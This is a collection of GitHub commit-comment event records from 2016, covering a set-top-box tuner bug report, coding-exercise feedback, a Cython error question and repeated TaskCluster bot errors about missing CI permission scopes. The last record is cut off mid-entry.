{"id":"4621126147","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19182394,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-26T23:37:23Z","updated_at":"2016-09-26T23:37:23Z","body":"GIGA DVB-C/T2 NIM (SI4768)\r\n\r\nAnother problem with this tuner with this commit. \r\nDo a cable scan. Finds channels. But when selecting the channel it instantly comes up saying cannot tune message.\r\nSwitch to DVB-T2 and save.\r\nSwitch to DVB-C and save.\r\nChannels now play fine.\r\nReboot.\r\nChannels no longer tune.\r\nRepeat above and channels play again until next reboot."}},"created_at":"2016-09-26T23:37:23Z"}
{"id":"4621133539","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"vnkumar27/dsp"},"payload":{"comment":{"id":19182410,"position":null,"line":null,"path":null,"commit_id":"9c22237270aaeea88823bd56b8d7c61bc311ded5","created_at":"2016-09-26T23:39:23Z","updated_at":"2016-09-26T23:39:23Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @vnkumar27 \r\n\r\nGood work on linear algebra! Some comments:\r\n- 2.4: It's the dot product of `u` and `v` that's desired here, i.e. `np.dot(u,v)`, which equals 51.\r\n- Good work on the bonus questions too!\r\n\r\n👍 "}},"created_at":"2016-09-26T23:39:23Z"}
{"id":"4621135440","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"thisisserious/rho_code_challenge_1"},"payload":{"comment":{"id":19182416,"position":18,"line":14,"path":"4-arrays/builtins.js","commit_id":"19e91f108c08f4ddc438469ff28a9fda04a7812f","created_at":"2016-09-26T23:39:57Z","updated_at":"2016-09-26T23:39:57Z","body":"Appropriate use of map here, but we want to halve the numbers, not get the square root. Consider if we had the number 6. Half would be 3, but the square root of that would be 2.45."}},"created_at":"2016-09-26T23:39:57Z"}
{"id":"4621138343","type":"CommitCommentEvent","actor":{"login":"pacahon"},"repo":{"name":"pacahon/datrie"},"payload":{"comment":{"id":19182422,"position":16,"line":913,"path":"src/datrie.pyx","commit_id":"9b4daa9e8a3a84e6e14211536e315817cd971aa5","created_at":"2016-09-26T23:40:45Z","updated_at":"2016-09-26T23:40:45Z","body":"```\r\nAttributeError: 'datrie.BaseState' object has no attribute '_trie'\r\n```\r\n"}},"created_at":"2016-09-26T23:40:45Z"}
{"id":"4621141827","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19182435,"position":null,"line":null,"path":null,"commit_id":"56f978d43547db21ab8367f81f6a3689f31092dc","created_at":"2016-09-26T23:41:41Z","updated_at":"2016-09-26T23:41:41Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VeLCKBALQHub0b9l4PDtCw"}},"created_at":"2016-09-26T23:41:41Z"}
{"id":"4621149606","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"thisisserious/rho_code_challenge_1"},"payload":{"comment":{"id":19182459,"position":20,"line":22,"path":"6-objects/literal.js","commit_id":"19e91f108c08f4ddc438469ff28a9fda04a7812f","created_at":"2016-09-26T23:43:44Z","updated_at":"2016-09-26T23:43:44Z","body":"A method implies a function. So, we were looking for something like\r\n```\r\nprime.print = function () {\r\n  console.log(this.address + ' ' + this.city + ' ' + this.state + ' ' + this.zip);\r\n}\r\n```"}},"created_at":"2016-09-26T23:43:44Z"}
{"id":"4621150989","type":"CommitCommentEvent","actor":{"login":"pacahon"},"repo":{"name":"pacahon/datrie"},"payload":{"comment":{"id":19182461,"position":16,"line":913,"path":"src/datrie.pyx","commit_id":"9b4daa9e8a3a84e6e14211536e315817cd971aa5","created_at":"2016-09-26T23:44:05Z","updated_at":"2016-09-26T23:44:05Z","body":"@superbobry This attribute defined in `_TrieState.__cinit__` method. Looks like it's invisible for python. Anyway, how I can access this attribute?"}},"created_at":"2016-09-26T23:44:05Z"}
{"id":"4621155862","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19182479,"position":null,"line":null,"path":null,"commit_id":"1b276fccd6e727a840ac706ab95b1255f6e48696","created_at":"2016-09-26T23:45:25Z","updated_at":"2016-09-26T23:45:25Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"MjbvHMF5RLGY2sgDO3I5WA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"routes\\\": [\\n    \\\"index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ],\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"data\\\": {\\n      \\\"base\\\": {\\n        \\\"sha\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n        \\\"user\\\": {\\n          \\\"login\\\": \\\"mozilla-releng\\\"\\n        }\\n      },\\n      \\\"head\\\": {\\n        \\\"sha\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n        \\\"user\\\": {\\n          \\\"email\\\": \\\"gregory.szorc@gmail.com\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 600,\\n    \\\"image\\\": \\\"grenade/opencloudconfig\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"--login\\\",\\n      \\\"-c\\\",\\n      \\\"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout master && echo \\\\\\\"do lint stuff here\\\\\\\"\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 11,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"indygreg\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"gregory.szorc@gmail.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Validate submission (not implemented)\\\",\\n    \\\"description\\\": \\\"todo: run a linter against json and powershell files\\\",\\n    \\\"owner\\\": \\\"gregory.szorc@gmail.com\\\",\\n    \\\"source\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T23:45:25.734Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T23:45:25.734Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"dECAFsbFTM-D6SNp9gvaiw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T23:45:25.734Z\\\"\\n}\\n  time:     2016-09-26T23:45:25.858Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"MjbvHMF5RLGY2sgDO3I5WA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"routes\\\": [\\n    \\\"index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n  ],\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"data\\\": {\\n      \\\"base\\\": {\\n        \\\"sha\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n        \\\"user\\\": {\\n          \\\"login\\\": \\\"mozilla-releng\\\"\\n        }\\n      },\\n      \\\"head\\\": {\\n        \\\"sha\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n        \\\"user\\\": {\\n          \\\"email\\\": \\\"gregory.szorc@gmail.com\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 600,\\n    \\\"image\\\": \\\"grenade/opencloudconfig\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"--login\\\",\\n      \\\"-c\\\",\\n      \\\"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout master && echo \\\\\\\"do lint stuff here\\\\\\\"\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 11,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"indygreg\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"1b276fccd6e727a840ac706ab95b1255f6e48696\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"gregory.szorc@gmail.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Validate submission (not implemented)\\\",\\n    \\\"description\\\": \\\"todo: run a linter against json and powershell files\\\",\\n    \\\"owner\\\": \\\"gregory.szorc@gmail.com\\\",\\n    \\\"source\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T23:45:25.734Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T23:45:25.734Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"dECAFsbFTM-D6SNp9gvaiw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T23:45:25.734Z\\\"\\n}\\n  time:     2016-09-26T23:45:25.858Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"MjbvHMF5RLGY2sgDO3I5WA\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"routes\": [\n                        \"index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\"\n                    ],\n                    \"workerType\": \"github-worker\",\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ]\n                        },\n                        \"data\": {\n                            \"base\": {\n                                \"sha\": \"a41b2c9df1641b2776a283324acc78675a0ed251\",\n                                \"user\": {\n                                    \"login\": \"mozilla-releng\"\n                                }\n                            },\n                            \"head\": {\n                                \"sha\": \"1b276fccd6e727a840ac706ab95b1255f6e48696\",\n                                \"user\": {\n                                    \"email\": \"gregory.szorc@gmail.com\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 600,\n                        \"image\": \"grenade/opencloudconfig\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"--login\",\n                            \"-c\",\n                            \"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout master && echo \\\"do lint stuff here\\\"\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"pull_request.closed\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 11,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/OpenCloudConfig.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"a41b2c9df1641b2776a283324acc78675a0ed251\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/indygreg/OpenCloudConfig.git\",\n                            \"GITHUB_HEAD_USER\": \"indygreg\",\n                            \"GITHUB_HEAD_SHA\": \"1b276fccd6e727a840ac706ab95b1255f6e48696\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"gregory.szorc@gmail.com\"\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Validate submission (not implemented)\",\n                        \"description\": \"todo: run a linter against json and powershell files\",\n                        \"owner\": \"gregory.szorc@gmail.com\",\n                        \"source\": \"https://github.com/indygreg/OpenCloudConfig.git\"\n                    },\n                    \"created\": \"2016-09-26T23:45:25.734Z\",\n                    \"deadline\": \"2016-09-27T23:45:25.734Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"dECAFsbFTM-D6SNp9gvaiw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-27T23:45:25.734Z\"\n                },\n                \"time\": \"2016-09-26T23:45:25.858Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:index.project.releng.opencloudconfig.v1.revision.1b276fccd6e727a840ac706ab95b1255f6e48696.validation\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-26T23:45:25Z"}
{"id":"4621157706","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19182487,"position":null,"line":null,"path":null,"commit_id":"b186e5d971d142a78626b757fde3dfc47128c213","created_at":"2016-09-26T23:45:56Z","updated_at":"2016-09-26T23:45:56Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"XKSM4oWcTLyVNDVefYtTew\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"routes\\\": [\\n    \\\"index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n  ],\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"data\\\": {\\n      \\\"base\\\": {\\n        \\\"sha\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n        \\\"user\\\": {\\n          \\\"login\\\": \\\"mozilla-releng\\\"\\n        }\\n      },\\n      \\\"head\\\": {\\n        \\\"sha\\\": \\\"b186e5d971d142a78626b757fde3dfc47128c213\\\",\\n        \\\"user\\\": {\\n          \\\"email\\\": \\\"gregory.szorc@gmail.com\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 600,\\n    \\\"image\\\": \\\"grenade/opencloudconfig\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"--login\\\",\\n      \\\"-c\\\",\\n      \\\"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout hg-checkout-fixes && echo \\\\\\\"do lint stuff here\\\\\\\"\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 12,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"indygreg\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b186e5d971d142a78626b757fde3dfc47128c213\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"hg-checkout-fixes\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"gregory.szorc@gmail.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Validate submission (not implemented)\\\",\\n    \\\"description\\\": \\\"todo: run a linter against json and powershell files\\\",\\n    \\\"owner\\\": \\\"gregory.szorc@gmail.com\\\",\\n    \\\"source\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T23:45:56.778Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T23:45:56.778Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"EscBRAoPQgeDMk2QWNWQeA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T23:45:56.778Z\\\"\\n}\\n  time:     2016-09-26T23:45:56.897Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"XKSM4oWcTLyVNDVefYtTew\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"routes\\\": [\\n    \\\"index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n  ],\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"data\\\": {\\n      \\\"base\\\": {\\n        \\\"sha\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n        \\\"user\\\": {\\n          \\\"login\\\": \\\"mozilla-releng\\\"\\n        }\\n      },\\n      \\\"head\\\": {\\n        \\\"sha\\\": \\\"b186e5d971d142a78626b757fde3dfc47128c213\\\",\\n        \\\"user\\\": {\\n          \\\"email\\\": \\\"gregory.szorc@gmail.com\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 600,\\n    \\\"image\\\": \\\"grenade/opencloudconfig\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"--login\\\",\\n      \\\"-c\\\",\\n      \\\"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout hg-checkout-fixes && echo \\\\\\\"do lint stuff here\\\\\\\"\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 12,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"a41b2c9df1641b2776a283324acc78675a0ed251\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"indygreg\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b186e5d971d142a78626b757fde3dfc47128c213\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"hg-checkout-fixes\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"gregory.szorc@gmail.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Validate submission (not implemented)\\\",\\n    \\\"description\\\": \\\"todo: run a linter against json and powershell files\\\",\\n    \\\"owner\\\": \\\"gregory.szorc@gmail.com\\\",\\n    \\\"source\\\": \\\"https://github.com/indygreg/OpenCloudConfig.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T23:45:56.778Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T23:45:56.778Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"EscBRAoPQgeDMk2QWNWQeA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T23:45:56.778Z\\\"\\n}\\n  time:     2016-09-26T23:45:56.897Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"XKSM4oWcTLyVNDVefYtTew\"\n                },\n                \"payload\": {\n                    \"provisionerId\": 